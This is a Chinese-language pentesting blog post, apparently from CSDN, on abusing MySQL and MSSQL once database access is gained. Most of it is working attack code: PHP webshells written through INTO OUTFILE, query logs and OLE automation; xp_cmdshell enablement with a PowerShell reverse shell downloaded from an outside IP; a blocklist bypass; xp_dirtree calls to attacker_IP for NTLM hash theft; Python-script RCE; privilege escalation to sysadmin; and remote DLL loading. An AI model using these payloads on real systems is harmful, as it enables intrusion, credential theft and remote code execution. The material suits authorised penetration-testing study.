恶意网站是怎么实现的,wordpress 用户功能,公益免费空间主机,哪里可以做免费网站这篇文章瘾小生其实想了很久#xff0c;到底是放在何处#xff0c;最终还是想着单拎出来总结#xff0c;因为数据库攻击对我们而言非常重要#xff0c;而且内容众多。本篇文章将讲述在各位获取数据库权限的情况下#xff0c;各个数据库会被如何滥用#xff0c;以及能够滥… 这篇文章瘾小生其实想了很久到底是放在何处最终还是想着单拎出来总结因为数据库攻击对我们而言非常重要而且内容众多。本篇文章将讲述在各位获取数据库权限的情况下各个数据库会被如何滥用以及能够滥用到什么程度。之后也会不断更新这篇文章让文章与时俱进。
Mysql mysql主要可以完成以下功能 1.outfile文件写入 2.日志文件写入 3.数据爬取 4.文件读取 滥用场景就是大家发挥想象力了大家可以想象mysql被咱们控制就意味着我们拥有上述能力。
outfile文件写入
mysql SELECT ?php echo shell_exec($_GET[c]);? INTO OUTFILE /var/www/html/webshell.php;
如果我们在dba权限下依旧无法完成这个过程很有可能是写入位置被限制了。我们需要有root账户对相关配置进行修改
mysql show variables like secure_file_priv; mysqld --secure-file-priv/your/custom/path/日志文件写入 日志文件写入存在一些问题因为我们只是具备插入数据的能力并不能控制整个文件这是值得注意的在webshell上传过程中没有太大问题。
SHOW VARIABLES LIKE %log%;SET GLOBAL general_log ON;
SET GLOBAL general_log_file /path/to/general.log; #写在Webshell处完成上面配置后mysql就会开始记录日志然后我们执行语句就会将语句插入到日志中了。
SELECT ?php system($_GET[cmd]); ?;数据爬取
#包含user和password列的表有哪些
SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE COLUMN_NAME IN (user, password) ORDER BY TABLE_SCHEMA, TABLE_NAME;#表名包含敏感信息的
SELECT TABLE_SCHEMA, TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_NAME LIKE %user%OR TABLE_NAME LIKE %account%OR TABLE_NAME LIKE %manager%
ORDER BY TABLE_SCHEMA, TABLE_NAME;文件读取
mysql select LOAD_FILE(/etc/passwd);--------------------------
| LOAD_FILE(/etc/passwd)
--------------------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/syncSNIP
mssql mssql的功能就比较复杂了通常和域高度绑定也是我们的重要目标点。主要有以下内容 1.冒充用户 2.链接服务器mssql命令执行 3.文件读取 4.文件写入 5.xp_cmdshell导致RCE 6.xp_dirtree、xp_subdirs、xp_fileexist配合smbserver窃取凭证中继哈希攻击 7.执行Python和R语言脚本导致RCE 8.普通用户从db_owner数据库提权 9.autoadmin_task_agents进行RCE 冒充用户 mssql允许执行用户获取另一个用户的登录权限。
# Find users you can impersonate
SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id b.principal_id
WHERE a.permission_name IMPERSONATE
# Check if the user sa or any other high privileged user is mentioned# Impersonate sa user
EXECUTE AS LOGIN sa
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER(sysadmin)
链接服务器执行mssql命令 mssql能够进行连接来统一管理我们可以利用这种信任关系游荡于mssql之间。[]里面就是链接的服务器
#展现所有链接的mssql
SELECT srvname, isremote FROM sysservers#查看链接服务器上的权限
EXECUTE(select servername, version, system_user, is_srvrolemember(sysadmin)) AT [LOCAL.TEST.LINKED.SRV]#在链接服务器上执行mssql语句
EXECUTE(SELECT * FROM OPENROWSET(BULK NC:/Users/Administrator/Desktop/flag.txt, SINGLE_CLOB) AS Contents) AT [LOCAL.TEST.LINKED.SRV]文件读取 mssql可以读取响应权限的文件
SELECT * FROM OPENROWSET(BULK NC:/Windows/System32/drivers/etc/hosts, SINGLE_CLOB) AS Contents 文件写入 mssql写入文件必须要开启Ole程序
# Enable Ole Automation Procedures
sp_configure show advanced options, 1
RECONFIGUREsp_configure Ole Automation Procedures, 1
RECONFIGURE# Create a File
DECLARE OLE INT
DECLARE FileID INT
EXECUTE sp_OACreate Scripting.FileSystemObject, OLE OUT
EXECUTE sp_OAMethod OLE, OpenTextFile, FileID OUT, c:\inetpub\wwwroot\webshell.php, 8, 1
EXECUTE sp_OAMethod FileID, WriteLine, Null, ?php echo shell_exec($_GET[c]);?
EXECUTE sp_OADestroy FileID
EXECUTE sp_OADestroy OLE xp_cmdshell导致RCE 参考于https://book.hacktricks.xyz/cn/network-services-pentesting/pentesting-mssql-microsoft-sql-server
# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name xp_cmdshell;# This turns on advanced options and is needed to configure xp_cmdshell
sp_configure show advanced options, 1
RECONFIGURE
#This enables xp_cmdshell
sp_configure xp_cmdshell, 1
RECONFIGURE#One liner
EXEC sp_configure Show Advanced Options, 1; RECONFIGURE; EXEC sp_configure xp_cmdshell, 1; RECONFIGURE;# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell whoami
# Get Rev shell
EXEC xp_cmdshell echo IEX(New-Object Net.WebClient).DownloadString(http://10.10.14.13:8000/rev.ps1) | powershell -noprofile# Bypass blackisted EXEC xp_cmdshell
; DECLARE x AS VARCHAR(100)xp_cmdshell; EXEC x ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net —
xp_dirtree、xp_subdirs、xp_fileexist配合smbserver窃取凭证中继哈希攻击 我们在此仅讨论触发此类攻击的命令因为这些指令可以让攻击者将hash传递给攻击者设备攻击者拿到这些hash后可以自行选择是中继还是窃取这个过程不在此讨论因为不知本文章的重点。关于中继和窃取的服务搭建可以查看我的文章渗透测试--哈希窃取哈希中继攻击-CSDN博客
xp_dirtree \\attacker_IP\any\thing
exec master.dbo.xp_dirtree \\attacker_IP\any\thing
EXEC master..xp_subdirs \\attacker_IP\anything\
EXEC master..xp_fileexist \\attacker_IP\anything\
执行Python和R语言脚本导致RCE mssql还存在调用Python和R语言脚本的能力。这可以结合我们之前的文章完成RCE和文件传输。渗透测试--编程语言传输文件-CSDN博客
渗透测试--获取shell-CSDN博客
# Print the user being used (and execute commands)
EXECUTE sp_execute_external_script language NPython, script Nprint(__import__(getpass).getuser())
EXECUTE sp_execute_external_script language NPython, script Nprint(__import__(os).system(whoami))
#Open and read a file
EXECUTE sp_execute_external_script language NPython, script Nprint(open(C:\\inetpub\\wwwroot\\web.config, r).read())
#Multiline
EXECUTE sp_execute_external_script language NPython, script N
import sys
print(sys.version)GO
普通用户从db_owner数据库提权 目前未碰到这种情况未进行个人验证。
转载于https://book.hacktricks.xyz/cn/network-services-pentesting/pentesting-mssql-microsoft-sql-server
# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases# Find trustworthy databases
SELECT a.name,b.is_trustworthy_on
FROM master..sysdatabases as a
INNER JOIN sys.databases as b
ON a.nameb.name;# Get roles over the selected database (look for your username as db_owner)
USE trustworthy_db
SELECT rp.name as database_role, mp.name as database_user
from sys.database_role_members drm
join sys.database_principals rp on (drm.role_principal_id rp.principal_id)
join sys.database_principals mp on (drm.member_principal_id mp.principal_id)# If you found you are db_owner of a trustworthy database, you can privesc:
--1. Create a stored procedure to add your user to sysadmin role
USE trustworthy_dbCREATE PROCEDURE sp_elevate_me
WITH EXECUTE AS OWNER
AS
EXEC sp_addsrvrolemember USERNAME,sysadmin--2. Execute stored procedure to get sysadmin role
USE trustworthy_db
EXEC sp_elevate_me--3. Verify your user is a sysadmin
SELECT is_srvrolemember(sysadmin) autoadmin_task_agents进行RCE 该操作未经过验证转载于https://book.hacktricks.xyz/cn/network-services-pentesting/pentesting-mssql-microsoft-sql-server
根据 这篇文章也可以加载远程 dll 并使 MSSQL 执行它方法如下
update autoadmin_task_agents set task_assembly_name class.dll, task_assembly_path\\remote-server\\ping.dll,classNameClass1.Class1;
using Microsoft.SqlServer.SmartAdmin;
using System;
using System.Diagnostics;namespace Class1
{
public class Class1 : TaskAgent
{
public Class1()
{Process process new Process();
process.StartInfo.FileName cmd.exe;
process.StartInfo.Arguments /c ping localhost -t;
process.StartInfo.UseShellExecute false;
process.StartInfo.RedirectStandardOutput true;
process.Start();
process.WaitForExit();
}public override void DoWork()
{}public override void ExternalJob(string command, LogBaseService jobLogger)
{}public override void Start(IServicesFactory services)
{}public override void Stop()
{}public void Test()
{}
}
}
